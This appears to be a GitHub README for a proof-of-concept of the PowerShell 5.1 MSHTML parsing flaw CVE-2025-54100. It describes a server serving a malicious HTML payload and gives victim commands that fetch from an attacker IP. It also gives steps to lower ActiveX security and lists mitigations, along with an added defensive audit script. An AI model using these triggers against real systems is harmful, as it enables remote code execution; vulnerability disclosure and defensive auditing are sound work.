ThemeHackers/CVE-2025-54100

CVE-2025-54100 – PowerShell Response Parsing PoC

A concise Proof-of-Concept showing how CVE-2025-54100 can lead to Remote Code Execution (RCE) in Windows PowerShell 5.1 through parsing of a malicious HTML response.
What is CVE-2025-54100?

  • Type: Command injection in Invoke-WebRequest when not using -UseBasicParsing
  • Severity: CVSS 7.8 (High)
  • Root cause: MSHTML-based parsing of HTML responses allows script execution (e.g., ActiveXObject) in the caller’s context.
  • Affected: Windows 10/11 and Windows Server 2008-2025 running PowerShell 5.1.

How the PoC Works

  1. The FastAPI server in CVE-2025-54100.py serves a crafted HTML payload.
  2. The payload attempts to instantiate WScript.Shell / Shell.Application ActiveX objects.
  3. On vulnerable hosts, the MSHTML parser executes the script, demonstrating RCE by launching calc.exe.
  4. The supplied payload is intentionally minimal and non-destructive but can be modified for further research.

Quick Start

Prerequisites

  • Python 3.10+ (tested with FastAPI & Uvicorn)
  • Install dependencies:

    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt

Run the malicious server

Start the PoC HTTP server:

uvicorn app:app --host 0.0.0.0  --port 8888 --reload

Triggering From a Victim Host

Run any of these on a vulnerable Windows machine, without -UseBasicParsing:

# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888

Use the same port you configured for the server. If the host is vulnerable, the embedded script executes via the MSHTML parser. Some AV products may block the resulting behavior even though the parsing issue is still present.

Troubleshooting & Verification

If calc.exe does not appear:

  1. Open Internet Options on the victim.
  2. Go to Security > Custom level...
  3. Enable “Initialize and script ActiveX controls not marked as safe for scripting.”
  4. Re-run Invoke-WebRequest without -UseBasicParsing.

This demonstrates the execution vector. Real-world payloads may use obfuscation or additional bypasses to evade default restrictions.

Evidence

(Screenshot: PoC)

Mitigation

Microsoft patched the issue in December 2025:

  1. Apply security updates on affected Windows hosts.
  2. Use -UseBasicParsing so the response is never handed to MSHTML:

    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing

  3. Move to PowerShell 7+ (pwsh), which does not rely on MSHTML for response parsing.
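Mitigation step 2 only helps if every Invoke-WebRequest call in your scripts actually carries the switch. The following audit function is an added example and is not part of this repository: it uses PowerShell's own AST parser to find calls to Invoke-WebRequest (or its Windows PowerShell 5.1 aliases iwr, curl and wget) that lack -UseBasicParsing, or that explicitly set -UseBasicParsing:$false. The function name, the parameter names and the sample script text are assumptions made for this example; the URLs in the sample are constructed and do not resolve.

```powershell
# Added example (not from the PoC repository): report Invoke-WebRequest calls
# that would fall back to MSHTML parsing on Windows PowerShell 5.1.
function Find-MshtmlParsingCalls {
    [CmdletBinding()]
    param(
        # Raw script text to audit (e.g. from Get-Content -Raw)
        [Parameter(Mandatory)]
        [string]$ScriptText,

        # Label used in the report, e.g. the file name
        [string]$Source = '<inline>'
    )

    $tokens = $null
    $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput(
        $ScriptText, [ref]$tokens, [ref]$errors)

    # Command names that resolve to Invoke-WebRequest in Windows PowerShell 5.1
    # (curl and wget are aliases there; they are not in PowerShell 6+)
    $targets = @('Invoke-WebRequest', 'iwr', 'curl', 'wget')

    $commands = $ast.FindAll({
        param($node)
        $node -is [System.Management.Automation.Language.CommandAst]
    }, $true)

    foreach ($cmd in $commands) {
        $name = $cmd.GetCommandName()
        if (-not $name -or $targets -notcontains $name) { continue }

        # Look for the switch; PowerShell accepts unambiguous prefixes such as -UseBasic
        $safe = $false
        foreach ($el in $cmd.CommandElements) {
            if ($el -is [System.Management.Automation.Language.CommandParameterAst] -and
                'UseBasicParsing'.StartsWith($el.ParameterName,
                    [System.StringComparison]::OrdinalIgnoreCase)) {
                # -UseBasicParsing:$false re-enables MSHTML parsing, so it does not count
                if ($el.Argument -and $el.Argument.Extent.Text -match '^\$false$') { continue }
                $safe = $true
            }
        }

        # Note: parameters passed via splatting (@params) are not resolved here
        if (-not $safe) {
            [pscustomobject]@{
                Source  = $Source
                Line    = $cmd.Extent.StartLineNumber
                Command = $cmd.Extent.Text
            }
        }
    }
}

# Constructed sample input for this example; lines 1, 3 and 4 should be reported
$sample = @'
Invoke-WebRequest -Uri "http://example.invalid/status"
iwr -Uri "http://example.invalid/a" -UseBasicParsing
curl http://example.invalid/b
wget -UseBasicParsing:$false http://example.invalid/c
'@
Find-MshtmlParsingCalls -ScriptText $sample -Source 'sample.ps1' | Format-Table -AutoSize

# Audit a whole script tree the same way
# Get-ChildItem -Path C:\Scripts -Filter *.ps1 -Recurse |
#     ForEach-Object { Find-MshtmlParsingCalls -ScriptText (Get-Content $_.FullName -Raw) -Source $_.FullName }
```

Using the AST rather than a regular expression means a `curl` inside a string or comment is not reported, and positional versus named arguments do not matter. Findings in scripts that must keep running on Windows PowerShell 5.1 should get the switch added; scripts that only run under pwsh are already outside the MSHTML code path.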

Disclaimer

Warning

For educational and authorized testing only. Use responsibly and comply with all applicable laws. The authors are not liable for misuse or damage.

About

CVE-2025-54100 (CVSS 7.8 High) is a command injection vulnerability in the Invoke-WebRequest cmdlet of Windows PowerShell 5.1. It arises from improper neutralization of special elements during the automatic parsing of Web responses.
